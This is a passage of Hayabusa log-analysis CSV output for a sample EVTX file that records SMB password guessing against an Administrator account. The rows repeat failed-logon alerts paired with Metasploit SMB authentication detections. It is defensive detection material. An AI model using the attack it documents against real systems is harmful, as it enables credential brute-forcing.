Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vtlr3HwzJcAfSxuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KDayr44iXmE63vqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkNoLVOhnS8ayujK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3ggg78jjziKqijrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BodeSVqeqa5qBQDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yY7yxEcuGwWSJZV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oTlg6cvsz6Z6QpCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3pTALzqu4Ok6CUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdGagQIEcvQQMp4n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVu4reOyQEIkChHO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EJWNS69MmMGLSnHc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPaR2sBxPPCjxpL0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kJJ9A1EfqM4V2TRv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dxf59xjpxO3oG17 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dMI12g4tjSF8PX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZAqN0xPaW4jg2Kjc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mcnReyIEaqsQfowV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: akOH8Y7XdjOpqTez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b0HOK1TIqloud7gh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n6uIAK55BmTnA6Bf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDnn6QmLOJ6KwzKt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np8KaRJvRqBrGyFL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dxbu69Amr6gWN5Hw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoZdaFJWNON8Ujnc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q4RSlXgOS7sssCqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2PJprE7olK4pjrx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQOAUcWQL32y2gGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nXI0wWwzhHN0uvOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujGqTzfOhmKgoAjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cFoPtWZ03O3ZZgOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyO2VTnpGZLeSIvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ua69MEWABQ9hsooT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubPQWn4nQYr3rXr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xrgATdNqkA44nKqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKwktiUfTWakNx3I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVebPFnWhbZKIANs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IyV8stIvfXLJQpsn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uStfvm0y0eZrWONH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUwTyUXe8NLG7bCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HQuDp8aZpWDANKMe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQKTlzx2gq9ayAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tCzVponBvb9mbyIr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mSwnrFv90KjN2cqj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QX5TLs2MPkia1cmk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ammLKlG1Q5awQGvN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJ1ijJjPJbF4uFlo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZOLnwIzpGz03Yjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 